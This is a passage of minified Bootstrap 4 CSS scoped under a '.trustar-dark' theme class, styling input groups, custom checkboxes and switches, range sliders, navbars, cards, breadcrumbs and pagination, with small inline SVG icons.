.input-group>.custom-select,.trustar-dark .input-group>.custom-file{position:relative;flex:1 1 auto;width:1%;margin-bottom:0}.trustar-dark .input-group>.form-control+.form-control,.trustar-dark .input-group>.form-control+.custom-select,.trustar-dark .input-group>.form-control+.custom-file,.trustar-dark .input-group>.form-control-plaintext+.form-control,.trustar-dark .input-group>.form-control-plaintext+.custom-select,.trustar-dark .input-group>.form-control-plaintext+.custom-file,.trustar-dark .input-group>.custom-select+.form-control,.trustar-dark .input-group>.custom-select+.custom-select,.trustar-dark .input-group>.custom-select+.custom-file,.trustar-dark .input-group>.custom-file+.form-control,.trustar-dark .input-group>.custom-file+.custom-select,.trustar-dark .input-group>.custom-file+.custom-file{margin-left:-1px}.trustar-dark .input-group>.form-control:focus,.trustar-dark .input-group>.custom-select:focus,.trustar-dark .input-group>.custom-file .custom-file-input:focus ~ .custom-file-label{z-index:3}.trustar-dark .input-group>.custom-file .custom-file-input:focus{z-index:4}.trustar-dark .input-group>.form-control:not(:last-child),.trustar-dark .input-group>.custom-select:not(:last-child){border-top-right-radius:0;border-bottom-right-radius:0}.trustar-dark .input-group>.form-control:not(:first-child),.trustar-dark .input-group>.custom-select:not(:first-child){border-top-left-radius:0;border-bottom-left-radius:0}.trustar-dark .input-group>.custom-file{display:flex;align-items:center}.trustar-dark .input-group>.custom-file:not(:last-child) .custom-file-label,.trustar-dark .input-group>.custom-file:not(:last-child) .custom-file-label::after{border-top-right-radius:0;border-bottom-right-radius:0}.trustar-dark .input-group>.custom-file:not(:first-child) .custom-file-label{border-top-left-radius:0;border-bottom-left-radius:0}.trustar-dark .input-group-prepend,.trustar-dark .input-group-append{display:flex}.trustar-dark .input-group-prepend .btn,.trustar-dark .input-group-append .btn{position:relative;z-index:2}.trustar-dark .input-group-prepend .btn:focus,.trustar-dark .input-group-append .btn:focus{z-index:3}.trustar-dark .input-group-prepend .btn+.btn,.trustar-dark .input-group-prepend .btn+.input-group-text,.trustar-dark .input-group-prepend .input-group-text+.input-group-text,.trustar-dark .input-group-prepend .input-group-text+.btn,.trustar-dark .input-group-append .btn+.btn,.trustar-dark .input-group-append .btn+.input-group-text,.trustar-dark .input-group-append .input-group-text+.input-group-text,.trustar-dark .input-group-append .input-group-text+.btn{margin-left:-1px}.trustar-dark .input-group-prepend{margin-right:-1px}.trustar-dark .input-group-append{margin-left:-1px}.trustar-dark .input-group-text{display:flex;align-items:center;padding:.375rem .75rem;margin-bottom:0;font-size:1rem;font-weight:400;line-height:1.5;color:#495057;text-align:center;white-space:nowrap;background-color:#e9ecef;border:1px solid #ced4da;border-radius:.25rem}.trustar-dark .input-group-text input[type=\"radio\"],.trustar-dark .input-group-text input[type=\"checkbox\"]{margin-top:0}.trustar-dark .input-group-lg>.form-control:not(textarea),.trustar-dark .input-group-lg>.custom-select{height:calc(2.875rem + 2px)}.trustar-dark .input-group-lg>.form-control,.trustar-dark .input-group-lg>.custom-select,.trustar-dark .input-group-lg>.input-group-prepend>.input-group-text,.trustar-dark .input-group-lg>.input-group-append>.input-group-text,.trustar-dark .input-group-lg>.input-group-prepend>.btn,.trustar-dark .input-group-lg>.input-group-append>.btn{padding:.5rem 1rem;font-size:1.25rem;line-height:1.5;border-radius:.3rem}.trustar-dark .input-group-sm>.form-control:not(textarea),.trustar-dark .input-group-sm>.custom-select{height:calc(1.8125rem + 2px)}.trustar-dark .input-group-sm>.form-control,.trustar-dark .input-group-sm>.custom-select,.trustar-dark .input-group-sm>.input-group-prepend>.input-group-text,.trustar-dark .input-group-sm>.input-group-append>.input-group-text,.trustar-dark .input-group-sm>.input-group-prepend>.btn,.trustar-dark .input-group-sm>.input-group-append>.btn{padding:.25rem .5rem;font-size:.875rem;line-height:1.5;border-radius:.2rem}.trustar-dark .input-group-lg>.custom-select,.trustar-dark .input-group-sm>.custom-select{padding-right:1.75rem}.trustar-dark .input-group>.input-group-prepend>.btn,.trustar-dark .input-group>.input-group-prepend>.input-group-text,.trustar-dark .input-group>.input-group-append:not(:last-child)>.btn,.trustar-dark .input-group>.input-group-append:not(:last-child)>.input-group-text,.trustar-dark .input-group>.input-group-append:last-child>.btn:not(:last-child):not(.dropdown-toggle),.trustar-dark .input-group>.input-group-append:last-child>.input-group-text:not(:last-child){border-top-right-radius:0;border-bottom-right-radius:0}.trustar-dark .input-group>.input-group-append>.btn,.trustar-dark .input-group>.input-group-append>.input-group-text,.trustar-dark .input-group>.input-group-prepend:not(:first-child)>.btn,.trustar-dark .input-group>.input-group-prepend:not(:first-child)>.input-group-text,.trustar-dark .input-group>.input-group-prepend:first-child>.btn:not(:first-child),.trustar-dark .input-group>.input-group-prepend:first-child>.input-group-text:not(:first-child){border-top-left-radius:0;border-bottom-left-radius:0}.trustar-dark .custom-control{position:relative;display:block;min-height:1.5rem;padding-left:1.5rem}.trustar-dark .custom-control-inline{display:inline-flex;margin-right:1rem}.trustar-dark .custom-control-input{position:absolute;z-index:-1;opacity:0}.trustar-dark .custom-control-input:checked ~ .custom-control-label::before{color:#fff;border-color:#007bff;background-color:#007bff}.trustar-dark .custom-control-input:focus ~ .custom-control-label::before{box-shadow:0 0 0 .2rem rgba(0,123,255,0.25)}.trustar-dark .custom-control-input:focus:not(:checked) ~ .custom-control-label::before{border-color:#80bdff}.trustar-dark .custom-control-input:not(:disabled):active ~ .custom-control-label::before{color:#fff;background-color:#b3d7ff;border-color:#b3d7ff}.trustar-dark .custom-control-input:disabled ~ .custom-control-label{color:#6c757d}.trustar-dark .custom-control-input:disabled ~ .custom-control-label::before{background-color:#e9ecef}.trustar-dark .custom-control-label{position:relative;margin-bottom:0;vertical-align:top}.trustar-dark .custom-control-label::before{position:absolute;top:.25rem;left:-1.5rem;display:block;width:1rem;height:1rem;pointer-events:none;content:\"\";background-color:#fff;border:#adb5bd solid 1px}.trustar-dark .custom-control-label::after{position:absolute;top:.25rem;left:-1.5rem;display:block;width:1rem;height:1rem;content:\"\";background-repeat:no-repeat;background-position:center center;background-size:50% 50%}.trustar-dark .custom-checkbox .custom-control-label::before{border-radius:.25rem}.trustar-dark .custom-checkbox .custom-control-input:checked ~ .custom-control-label::after{background-image:url(\"data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 8 8'%3e%3cpath fill='%23fff' d='M6.564.75l-3.59 3.612-1.538-1.55L0 4.26 2.974 7.25 8 2.193z'/%3e%3c/svg%3e\")}.trustar-dark .custom-checkbox .custom-control-input:indeterminate ~ .custom-control-label::before{border-color:#007bff;background-color:#007bff}.trustar-dark .custom-checkbox .custom-control-input:indeterminate ~ .custom-control-label::after{background-image:url(\"data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 4 4'%3e%3cpath stroke='%23fff' d='M0 2h4'/%3e%3c/svg%3e\")}.trustar-dark .custom-checkbox .custom-control-input:disabled:checked ~ .custom-control-label::before{background-color:rgba(0,123,255,0.5)}.trustar-dark .custom-checkbox .custom-control-input:disabled:indeterminate ~ .custom-control-label::before{background-color:rgba(0,123,255,0.5)}.trustar-dark .custom-radio .custom-control-label::before{border-radius:50%}.trustar-dark .custom-radio .custom-control-input:checked ~ .custom-control-label::after{background-image:url(\"data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='-4 -4 8 8'%3e%3ccircle r='3' fill='%23fff'/%3e%3c/svg%3e\")}.trustar-dark .custom-radio .custom-control-input:disabled:checked ~ .custom-control-label::before{background-color:rgba(0,123,255,0.5)}.trustar-dark .custom-switch{padding-left:2.25rem}.trustar-dark .custom-switch .custom-control-label::before{left:-2.25rem;width:1.75rem;pointer-events:all;border-radius:.5rem}.trustar-dark .custom-switch .custom-control-label::after{top:calc(.25rem + 2px);left:calc(-2.25rem + 2px);width:calc(1rem - 4px);height:calc(1rem - 4px);background-color:#adb5bd;border-radius:.5rem;transition:background-color 0.15s ease-in-out,border-color 0.15s ease-in-out,box-shadow 0.15s ease-in-out,-webkit-transform 0.15s ease-in-out;transition:transform 0.15s ease-in-out,background-color 0.15s ease-in-out,border-color 0.15s ease-in-out,box-shadow 0.15s ease-in-out;transition:transform 0.15s ease-in-out,background-color 0.15s ease-in-out,border-color 0.15s ease-in-out,box-shadow 0.15s ease-in-out,-webkit-transform 0.15s ease-in-out}@media screen and (prefers-reduced-motion: reduce){.trustar-dark .custom-switch .custom-control-label::after{transition:none}}.trustar-dark .custom-switch .custom-control-input:checked ~ .custom-control-label::after{background-color:#fff;-webkit-transform:translateX(.75rem);transform:translateX(.75rem)}.trustar-dark .custom-switch .custom-control-input:disabled:checked ~ .custom-control-label::before{background-color:rgba(0,123,255,0.5)}.trustar-dark .custom-select{display:inline-block;width:100%;height:calc(2.25rem + 2px);padding:.375rem 1.75rem .375rem .75rem;font-weight:400;line-height:1.5;color:#495057;vertical-align:middle;background:url(\"data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 4 5'%3e%3cpath fill='%23343a40' d='M2 0L0 2h4zm0 5L0 3h4z'/%3e%3c/svg%3e\") no-repeat right .75rem center/8px 10px;background-color:#fff;border:1px solid #ced4da;border-radius:.25rem;-webkit-appearance:none;-moz-appearance:none;appearance:none}.trustar-dark .custom-select:focus{border-color:#80bdff;outline:0;box-shadow:0 0 0 .2rem rgba(128,189,255,0.5)}.trustar-dark .custom-select:focus::-ms-value{color:#495057;background-color:#fff}.trustar-dark .custom-select[multiple],.trustar-dark .custom-select[size]:not([size=\"1\"]){height:auto;padding-right:.75rem;background-image:none}.trustar-dark .custom-select:disabled{color:#6c757d;background-color:#e9ecef}.trustar-dark .custom-select::-ms-expand{opacity:0}.trustar-dark .custom-select-sm{height:calc(1.8125rem + 2px);padding-top:.25rem;padding-bottom:.25rem;padding-left:.5rem;font-size:.875rem}.trustar-dark .custom-select-lg{height:calc(2.875rem + 2px);padding-top:.5rem;padding-bottom:.5rem;padding-left:1rem;font-size:1.25rem}.trustar-dark .custom-file{position:relative;display:inline-block;width:100%;height:calc(2.25rem + 2px);margin-bottom:0}.trustar-dark .custom-file-input{position:relative;z-index:2;width:100%;height:calc(2.25rem + 2px);margin:0;opacity:0}.trustar-dark .custom-file-input:focus ~ .custom-file-label{border-color:#80bdff;box-shadow:0 0 0 .2rem rgba(0,123,255,0.25)}.trustar-dark .custom-file-input:disabled ~ .custom-file-label{background-color:#e9ecef}.trustar-dark .custom-file-input:lang(en) ~ .custom-file-label::after{content:\"Browse\"}.trustar-dark .custom-file-input ~ .custom-file-label[data-browse]::after{content:attr(data-browse)}.trustar-dark .custom-file-label{position:absolute;top:0;right:0;left:0;z-index:1;height:calc(2.25rem + 2px);padding:.375rem .75rem;font-weight:400;line-height:1.5;color:#495057;background-color:#fff;border:1px solid #ced4da;border-radius:.25rem}.trustar-dark .custom-file-label::after{position:absolute;top:0;right:0;bottom:0;z-index:3;display:block;height:2.25rem;padding:.375rem .75rem;line-height:1.5;color:#495057;content:\"Browse\";background-color:#e9ecef;border-left:inherit;border-radius:0 .25rem .25rem 0}.trustar-dark .custom-range{width:100%;height:calc(1rem + .4rem);padding:0;background-color:transparent;-webkit-appearance:none;-moz-appearance:none;appearance:none}.trustar-dark .custom-range:focus{outline:none}.trustar-dark .custom-range:focus::-webkit-slider-thumb{box-shadow:0 0 0 1px #fff,0 0 0 .2rem rgba(0,123,255,0.25)}.trustar-dark .custom-range:focus::-moz-range-thumb{box-shadow:0 0 0 1px #fff,0 0 0 .2rem rgba(0,123,255,0.25)}.trustar-dark .custom-range:focus::-ms-thumb{box-shadow:0 0 0 1px #fff,0 0 0 .2rem rgba(0,123,255,0.25)}.trustar-dark .custom-range::-moz-focus-outer{border:0}.trustar-dark .custom-range::-webkit-slider-thumb{width:1rem;height:1rem;margin-top:-.25rem;background-color:#007bff;border:0;border-radius:1rem;transition:background-color 0.15s ease-in-out,border-color 0.15s ease-in-out,box-shadow 0.15s ease-in-out;-webkit-appearance:none;appearance:none}@media screen and (prefers-reduced-motion: reduce){.trustar-dark .custom-range::-webkit-slider-thumb{transition:none}}.trustar-dark .custom-range::-webkit-slider-thumb:active{background-color:#b3d7ff}.trustar-dark .custom-range::-webkit-slider-runnable-track{width:100%;height:.5rem;color:transparent;cursor:pointer;background-color:#dee2e6;border-color:transparent;border-radius:1rem}.trustar-dark .custom-range::-moz-range-thumb{width:1rem;height:1rem;background-color:#007bff;border:0;border-radius:1rem;transition:background-color 0.15s ease-in-out,border-color 0.15s ease-in-out,box-shadow 0.15s ease-in-out;-moz-appearance:none;appearance:none}@media screen and (prefers-reduced-motion: reduce){.trustar-dark .custom-range::-moz-range-thumb{transition:none}}.trustar-dark .custom-range::-moz-range-thumb:active{background-color:#b3d7ff}.trustar-dark .custom-range::-moz-range-track{width:100%;height:.5rem;color:transparent;cursor:pointer;background-color:#dee2e6;border-color:transparent;border-radius:1rem}.trustar-dark .custom-range::-ms-thumb{width:1rem;height:1rem;margin-top:0;margin-right:.2rem;margin-left:.2rem;background-color:#007bff;border:0;border-radius:1rem;transition:background-color 0.15s ease-in-out,border-color 0.15s ease-in-out,box-shadow 0.15s ease-in-out;appearance:none}@media screen and (prefers-reduced-motion: reduce){.trustar-dark .custom-range::-ms-thumb{transition:none}}.trustar-dark .custom-range::-ms-thumb:active{background-color:#b3d7ff}.trustar-dark .custom-range::-ms-track{width:100%;height:.5rem;color:transparent;cursor:pointer;background-color:transparent;border-color:transparent;border-width:.5rem}.trustar-dark .custom-range::-ms-fill-lower{background-color:#dee2e6;border-radius:1rem}.trustar-dark .custom-range::-ms-fill-upper{margin-right:15px;background-color:#dee2e6;border-radius:1rem}.trustar-dark .custom-range:disabled::-webkit-slider-thumb{background-color:#adb5bd}.trustar-dark .custom-range:disabled::-webkit-slider-runnable-track{cursor:default}.trustar-dark .custom-range:disabled::-moz-range-thumb{background-color:#adb5bd}.trustar-dark .custom-range:disabled::-moz-range-track{cursor:default}.trustar-dark .custom-range:disabled::-ms-thumb{background-color:#adb5bd}.trustar-dark .custom-control-label::before,.trustar-dark .custom-file-label,.trustar-dark .custom-select{transition:background-color 0.15s ease-in-out,border-color 0.15s ease-in-out,box-shadow 0.15s ease-in-out}@media screen and (prefers-reduced-motion: reduce){.trustar-dark .custom-control-label::before,.trustar-dark .custom-file-label,.trustar-dark .custom-select{transition:none}}.trustar-dark .nav{display:flex;flex-wrap:wrap;padding-left:0;margin-bottom:0;list-style:none}.trustar-dark .nav-link{display:block;padding:.5rem 1rem}.trustar-dark .nav-link:hover,.trustar-dark .nav-link:focus{text-decoration:none}.trustar-dark .nav-link.disabled{color:#6c757d;pointer-events:none;cursor:default}.trustar-dark .nav-tabs{border-bottom:1px solid #dee2e6}.trustar-dark .nav-tabs .nav-item{margin-bottom:-1px}.trustar-dark .nav-tabs .nav-link{border:1px solid transparent;border-top-left-radius:.25rem;border-top-right-radius:.25rem}.trustar-dark .nav-tabs .nav-link:hover,.trustar-dark .nav-tabs .nav-link:focus{border-color:#e9ecef #e9ecef #dee2e6}.trustar-dark .nav-tabs .nav-link.disabled{color:#6c757d;background-color:transparent;border-color:transparent}.trustar-dark .nav-tabs .nav-link.active,.trustar-dark .nav-tabs .nav-item.show .nav-link{color:#495057;background-color:#fff;border-color:#dee2e6 #dee2e6 #fff}.trustar-dark .nav-tabs .dropdown-menu{margin-top:-1px;border-top-left-radius:0;border-top-right-radius:0}.trustar-dark .nav-pills .nav-link{border-radius:.25rem}.trustar-dark .nav-pills .nav-link.active,.trustar-dark .nav-pills .show>.nav-link{color:#fff;background-color:#007bff}.trustar-dark .nav-fill .nav-item{flex:1 1 auto;text-align:center}.trustar-dark .nav-justified .nav-item{flex-basis:0;flex-grow:1;text-align:center}.trustar-dark .tab-content>.tab-pane{display:none}.trustar-dark .tab-content>.active{display:block}.trustar-dark .navbar{position:relative;display:flex;flex-wrap:wrap;align-items:center;justify-content:space-between;padding:.5rem 1rem}.trustar-dark .navbar>.container,.trustar-dark .navbar>.container-fluid{display:flex;flex-wrap:wrap;align-items:center;justify-content:space-between}.trustar-dark .navbar-brand{display:inline-block;padding-top:.3125rem;padding-bottom:.3125rem;margin-right:1rem;font-size:1.25rem;line-height:inherit;white-space:nowrap}.trustar-dark .navbar-brand:hover,.trustar-dark .navbar-brand:focus{text-decoration:none}.trustar-dark .navbar-nav{display:flex;flex-direction:column;padding-left:0;margin-bottom:0;list-style:none}.trustar-dark .navbar-nav .nav-link{padding-right:0;padding-left:0}.trustar-dark .navbar-nav .dropdown-menu{position:static;float:none}.trustar-dark .navbar-text{display:inline-block;padding-top:.5rem;padding-bottom:.5rem}.trustar-dark .navbar-collapse{flex-basis:100%;flex-grow:1;align-items:center}.trustar-dark .navbar-toggler{padding:.25rem .75rem;font-size:1.25rem;line-height:1;background-color:transparent;border:1px solid transparent;border-radius:.25rem}.trustar-dark .navbar-toggler:hover,.trustar-dark .navbar-toggler:focus{text-decoration:none}.trustar-dark .navbar-toggler:not(:disabled):not(.disabled){cursor:pointer}.trustar-dark .navbar-toggler-icon{display:inline-block;width:1.5em;height:1.5em;vertical-align:middle;content:\"\";background:no-repeat center center;background-size:100% 100%}@media (max-width: 575.98px){.trustar-dark .navbar-expand-sm>.container,.trustar-dark .navbar-expand-sm>.container-fluid{padding-right:0;padding-left:0}}@media (min-width: 576px){.trustar-dark .navbar-expand-sm{flex-flow:row nowrap;justify-content:flex-start}.trustar-dark .navbar-expand-sm .navbar-nav{flex-direction:row}.trustar-dark .navbar-expand-sm .navbar-nav .dropdown-menu{position:absolute}.trustar-dark .navbar-expand-sm .navbar-nav .nav-link{padding-right:.5rem;padding-left:.5rem}.trustar-dark .navbar-expand-sm>.container,.trustar-dark .navbar-expand-sm>.container-fluid{flex-wrap:nowrap}.trustar-dark .navbar-expand-sm .navbar-collapse{display:flex !important;flex-basis:auto}.trustar-dark .navbar-expand-sm .navbar-toggler{display:none}}@media (max-width: 767.98px){.trustar-dark .navbar-expand-md>.container,.trustar-dark .navbar-expand-md>.container-fluid{padding-right:0;padding-left:0}}@media (min-width: 768px){.trustar-dark .navbar-expand-md{flex-flow:row nowrap;justify-content:flex-start}.trustar-dark .navbar-expand-md .navbar-nav{flex-direction:row}.trustar-dark .navbar-expand-md .navbar-nav .dropdown-menu{position:absolute}.trustar-dark .navbar-expand-md .navbar-nav .nav-link{padding-right:.5rem;padding-left:.5rem}.trustar-dark .navbar-expand-md>.container,.trustar-dark .navbar-expand-md>.container-fluid{flex-wrap:nowrap}.trustar-dark .navbar-expand-md .navbar-collapse{display:flex !important;flex-basis:auto}.trustar-dark .navbar-expand-md .navbar-toggler{display:none}}@media (max-width: 991.98px){.trustar-dark .navbar-expand-lg>.container,.trustar-dark .navbar-expand-lg>.container-fluid{padding-right:0;padding-left:0}}@media (min-width: 992px){.trustar-dark .navbar-expand-lg{flex-flow:row nowrap;justify-content:flex-start}.trustar-dark .navbar-expand-lg .navbar-nav{flex-direction:row}.trustar-dark .navbar-expand-lg .navbar-nav .dropdown-menu{position:absolute}.trustar-dark .navbar-expand-lg .navbar-nav .nav-link{padding-right:.5rem;padding-left:.5rem}.trustar-dark .navbar-expand-lg>.container,.trustar-dark .navbar-expand-lg>.container-fluid{flex-wrap:nowrap}.trustar-dark .navbar-expand-lg .navbar-collapse{display:flex !important;flex-basis:auto}.trustar-dark .navbar-expand-lg .navbar-toggler{display:none}}@media (max-width: 1199.98px){.trustar-dark .navbar-expand-xl>.container,.trustar-dark .navbar-expand-xl>.container-fluid{padding-right:0;padding-left:0}}@media (min-width: 1200px){.trustar-dark .navbar-expand-xl{flex-flow:row nowrap;justify-content:flex-start}.trustar-dark .navbar-expand-xl .navbar-nav{flex-direction:row}.trustar-dark .navbar-expand-xl .navbar-nav .dropdown-menu{position:absolute}.trustar-dark .navbar-expand-xl .navbar-nav .nav-link{padding-right:.5rem;padding-left:.5rem}.trustar-dark .navbar-expand-xl>.container,.trustar-dark .navbar-expand-xl>.container-fluid{flex-wrap:nowrap}.trustar-dark .navbar-expand-xl .navbar-collapse{display:flex !important;flex-basis:auto}.trustar-dark .navbar-expand-xl .navbar-toggler{display:none}}.trustar-dark .navbar-expand{flex-flow:row nowrap;justify-content:flex-start}.trustar-dark .navbar-expand>.container,.trustar-dark .navbar-expand>.container-fluid{padding-right:0;padding-left:0}.trustar-dark .navbar-expand .navbar-nav{flex-direction:row}.trustar-dark .navbar-expand .navbar-nav .dropdown-menu{position:absolute}.trustar-dark .navbar-expand .navbar-nav .nav-link{padding-right:.5rem;padding-left:.5rem}.trustar-dark .navbar-expand>.container,.trustar-dark .navbar-expand>.container-fluid{flex-wrap:nowrap}.trustar-dark .navbar-expand .navbar-collapse{display:flex !important;flex-basis:auto}.trustar-dark .navbar-expand .navbar-toggler{display:none}.trustar-dark .navbar-light .navbar-brand{color:rgba(0,0,0,0.9)}.trustar-dark .navbar-light .navbar-brand:hover,.trustar-dark .navbar-light .navbar-brand:focus{color:rgba(0,0,0,0.9)}.trustar-dark .navbar-light .navbar-nav .nav-link{color:rgba(0,0,0,0.5)}.trustar-dark .navbar-light .navbar-nav .nav-link:hover,.trustar-dark .navbar-light .navbar-nav .nav-link:focus{color:rgba(0,0,0,0.7)}.trustar-dark .navbar-light .navbar-nav .nav-link.disabled{color:rgba(0,0,0,0.3)}.trustar-dark .navbar-light .navbar-nav .show>.nav-link,.trustar-dark .navbar-light .navbar-nav .active>.nav-link,.trustar-dark .navbar-light .navbar-nav .nav-link.show,.trustar-dark .navbar-light .navbar-nav .nav-link.active{color:rgba(0,0,0,0.9)}.trustar-dark .navbar-light .navbar-toggler{color:rgba(0,0,0,0.5);border-color:rgba(0,0,0,0.1)}.trustar-dark .navbar-light .navbar-toggler-icon{background-image:url(\"data:image/svg+xml,%3csvg viewBox='0 0 30 30' xmlns='http://www.w3.org/2000/svg'%3e%3cpath stroke='rgba(0,0,0,0.5)' stroke-width='2' stroke-linecap='round' stroke-miterlimit='10' d='M4 7h22M4 15h22M4 23h22'/%3e%3c/svg%3e\")}.trustar-dark .navbar-light .navbar-text{color:rgba(0,0,0,0.5)}.trustar-dark .navbar-light .navbar-text a{color:rgba(0,0,0,0.9)}.trustar-dark .navbar-light .navbar-text a:hover,.trustar-dark .navbar-light .navbar-text a:focus{color:rgba(0,0,0,0.9)}.trustar-dark .navbar-dark .navbar-brand{color:#fff}.trustar-dark .navbar-dark .navbar-brand:hover,.trustar-dark .navbar-dark .navbar-brand:focus{color:#fff}.trustar-dark .navbar-dark .navbar-nav .nav-link{color:rgba(255,255,255,0.5)}.trustar-dark .navbar-dark .navbar-nav .nav-link:hover,.trustar-dark .navbar-dark .navbar-nav .nav-link:focus{color:rgba(255,255,255,0.75)}.trustar-dark .navbar-dark .navbar-nav .nav-link.disabled{color:rgba(255,255,255,0.25)}.trustar-dark .navbar-dark .navbar-nav .show>.nav-link,.trustar-dark .navbar-dark .navbar-nav .active>.nav-link,.trustar-dark .navbar-dark .navbar-nav .nav-link.show,.trustar-dark .navbar-dark .navbar-nav .nav-link.active{color:#fff}.trustar-dark .navbar-dark .navbar-toggler{color:rgba(255,255,255,0.5);border-color:rgba(255,255,255,0.1)}.trustar-dark .navbar-dark .navbar-toggler-icon{background-image:url(\"data:image/svg+xml,%3csvg viewBox='0 0 30 30' xmlns='http://www.w3.org/2000/svg'%3e%3cpath stroke='rgba(255,255,255,0.5)' stroke-width='2' stroke-linecap='round' stroke-miterlimit='10' d='M4 7h22M4 15h22M4 23h22'/%3e%3c/svg%3e\")}.trustar-dark .navbar-dark .navbar-text{color:rgba(255,255,255,0.5)}.trustar-dark .navbar-dark .navbar-text a{color:#fff}.trustar-dark .navbar-dark .navbar-text a:hover,.trustar-dark .navbar-dark .navbar-text a:focus{color:#fff}.trustar-dark .card{position:relative;display:flex;flex-direction:column;min-width:0;word-wrap:break-word;background-color:#fff;background-clip:border-box;border:1px solid rgba(0,0,0,0.125);border-radius:.25rem}.trustar-dark .card>hr{margin-right:0;margin-left:0}.trustar-dark .card>.list-group:first-child .list-group-item:first-child{border-top-left-radius:.25rem;border-top-right-radius:.25rem}.trustar-dark .card>.list-group:last-child .list-group-item:last-child{border-bottom-right-radius:.25rem;border-bottom-left-radius:.25rem}.trustar-dark .card-body{flex:1 1 auto;padding:1.25rem}.trustar-dark .card-title{margin-bottom:.75rem}.trustar-dark .card-subtitle{margin-top:-.375rem;margin-bottom:0}.trustar-dark .card-text:last-child{margin-bottom:0}.trustar-dark .card-link:hover{text-decoration:none}.trustar-dark .card-link+.card-link{margin-left:1.25rem}.trustar-dark .card-header{padding:.75rem 1.25rem;margin-bottom:0;color:inherit;background-color:rgba(0,0,0,0.03);border-bottom:1px solid rgba(0,0,0,0.125)}.trustar-dark .card-header:first-child{border-radius:calc(.25rem - 1px) calc(.25rem - 1px) 0 0}.trustar-dark .card-header+.list-group .list-group-item:first-child{border-top:0}.trustar-dark .card-footer{padding:.75rem 1.25rem;background-color:rgba(0,0,0,0.03);border-top:1px solid rgba(0,0,0,0.125)}.trustar-dark .card-footer:last-child{border-radius:0 0 calc(.25rem - 1px) calc(.25rem - 1px)}.trustar-dark .card-header-tabs{margin-right:-.625rem;margin-bottom:-.75rem;margin-left:-.625rem;border-bottom:0}.trustar-dark .card-header-pills{margin-right:-.625rem;margin-left:-.625rem}.trustar-dark .card-img-overlay{position:absolute;top:0;right:0;bottom:0;left:0;padding:1.25rem}.trustar-dark .card-img{width:100%;border-radius:calc(.25rem - 1px)}.trustar-dark .card-img-top{width:100%;border-top-left-radius:calc(.25rem - 1px);border-top-right-radius:calc(.25rem - 1px)}.trustar-dark .card-img-bottom{width:100%;border-bottom-right-radius:calc(.25rem - 1px);border-bottom-left-radius:calc(.25rem - 1px)}.trustar-dark .card-deck{display:flex;flex-direction:column}.trustar-dark .card-deck .card{margin-bottom:15px}@media (min-width: 576px){.trustar-dark .card-deck{flex-flow:row wrap;margin-right:-15px;margin-left:-15px}.trustar-dark .card-deck .card{display:flex;flex:1 0 0%;flex-direction:column;margin-right:15px;margin-bottom:0;margin-left:15px}}.trustar-dark .card-group{display:flex;flex-direction:column}.trustar-dark .card-group>.card{margin-bottom:15px}@media (min-width: 576px){.trustar-dark .card-group{flex-flow:row wrap}.trustar-dark .card-group>.card{flex:1 0 0%;margin-bottom:0}.trustar-dark .card-group>.card+.card{margin-left:0;border-left:0}.trustar-dark .card-group>.card:first-child{border-top-right-radius:0;border-bottom-right-radius:0}.trustar-dark .card-group>.card:first-child .card-img-top,.trustar-dark .card-group>.card:first-child .card-header{border-top-right-radius:0}.trustar-dark .card-group>.card:first-child .card-img-bottom,.trustar-dark .card-group>.card:first-child .card-footer{border-bottom-right-radius:0}.trustar-dark .card-group>.card:last-child{border-top-left-radius:0;border-bottom-left-radius:0}.trustar-dark .card-group>.card:last-child .card-img-top,.trustar-dark .card-group>.card:last-child .card-header{border-top-left-radius:0}.trustar-dark .card-group>.card:last-child .card-img-bottom,.trustar-dark .card-group>.card:last-child .card-footer{border-bottom-left-radius:0}.trustar-dark .card-group>.card:only-child{border-radius:.25rem}.trustar-dark .card-group>.card:only-child .card-img-top,.trustar-dark .card-group>.card:only-child .card-header{border-top-left-radius:.25rem;border-top-right-radius:.25rem}.trustar-dark .card-group>.card:only-child .card-img-bottom,.trustar-dark .card-group>.card:only-child .card-footer{border-bottom-right-radius:.25rem;border-bottom-left-radius:.25rem}.trustar-dark .card-group>.card:not(:first-child):not(:last-child):not(:only-child){border-radius:0}.trustar-dark .card-group>.card:not(:first-child):not(:last-child):not(:only-child) .card-img-top,.trustar-dark .card-group>.card:not(:first-child):not(:last-child):not(:only-child) .card-img-bottom,.trustar-dark .card-group>.card:not(:first-child):not(:last-child):not(:only-child) .card-header,.trustar-dark .card-group>.card:not(:first-child):not(:last-child):not(:only-child) .card-footer{border-radius:0}}.trustar-dark .card-columns .card{margin-bottom:.75rem}@media (min-width: 576px){.trustar-dark .card-columns{-webkit-column-count:3;column-count:3;-webkit-column-gap:1.25rem;column-gap:1.25rem;orphans:1;widows:1}.trustar-dark .card-columns .card{display:inline-block;width:100%}}.trustar-dark .accordion .card{overflow:hidden}.trustar-dark .accordion .card:not(:first-of-type) .card-header:first-child{border-radius:0}.trustar-dark .accordion .card:not(:first-of-type):not(:last-of-type){border-bottom:0;border-radius:0}.trustar-dark .accordion .card:first-of-type{border-bottom:0;border-bottom-right-radius:0;border-bottom-left-radius:0}.trustar-dark .accordion .card:last-of-type{border-top-left-radius:0;border-top-right-radius:0}.trustar-dark .accordion .card .card-header{margin-bottom:-1px}.trustar-dark .breadcrumb{display:flex;flex-wrap:wrap;padding:.75rem 1rem;margin-bottom:1rem;list-style:none;background-color:#e9ecef;border-radius:.25rem}.trustar-dark .breadcrumb-item+.breadcrumb-item{padding-left:.5rem}.trustar-dark .breadcrumb-item+.breadcrumb-item::before{display:inline-block;padding-right:.5rem;color:#6c757d;content:\"/\"}.trustar-dark .breadcrumb-item+.breadcrumb-item:hover::before{text-decoration:underline}.trustar-dark .breadcrumb-item+.breadcrumb-item:hover::before{text-decoration:none}.trustar-dark .breadcrumb-item.active{color:#6c757d}.trustar-dark .pagination{display:flex;padding-left:0;list-style:none;border-radius:.25rem}.trustar-dark .page-link{position:relative;display:block;padding:.5rem .75rem;margin-left:-1px;line-height:1.25;color:#007bff;background-color:#fff;border:1px solid #dee2e6}.trustar-dark .page-link:hover{z-index:2;color:#0056b3;text-decoration:none;background-color:#e9ecef;border-color:#dee2e6}.trustar-dark .page-link:focus{z-index:2;outline:0;box-shadow:0 0 0 .2rem rgba(0,123,255,0.25)}.trustar-dark .page-link:not(:disabled):not(.disabled){cursor:pointer}.trustar-dark .page-item:first-child .page-link{margin-left:0;border-top-left-radius:.25rem;border-bottom-left-radius:.25rem}.trustar-dark 